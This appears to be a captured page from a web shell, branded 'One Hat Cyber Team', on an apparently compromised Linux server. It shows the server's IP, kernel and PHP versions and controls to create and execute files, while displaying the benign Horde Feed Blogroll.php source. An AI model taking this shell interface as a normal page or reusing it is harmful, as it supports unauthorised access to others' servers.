⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.78
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
php
/
Horde
/
Feed
/
View File Name :
Blogroll.php
* @license http://www.horde.org/licenses/bsd BSD * @category Horde * @package Feed */ /** * Blogroll feed list class * * This is not a generic OPML implementation, but one focused on lists of feeds, * i.e. blogrolls. See http://en.wikipedia.org/wiki/OPML for more information on * OPML. * * @author Chuck Hagenbuch
* @license http://www.horde.org/licenses/bsd BSD * @category Horde * @package Feed */ class Horde_Feed_Blogroll extends Horde_Feed_Base { /** * The classname for individual feed elements. * @var string */ protected $_listItemClassName = 'Horde_Feed_Entry_Blogroll'; /** * The default namespace for blogrolls. * @var string */ protected $_defaultNamespace = ''; /** * The XML string for an "empty" Blogroll. * @var string */ protected $_emptyXml = '
'; /** * Cache outline elements so they don't need to be searched for on every * operation. */ protected function _buildListItemCache() { $entries = array(); foreach ($this->_element->getElementsByTagName('outline') as $child) { if ($child->attributes->getNamedItem('xmlUrl')) { $entries[] = $child; } } return $entries; } public function getBody() { return $this; } public function getOutline() { return $this; } public function getTitle() { return $this->head->title; } }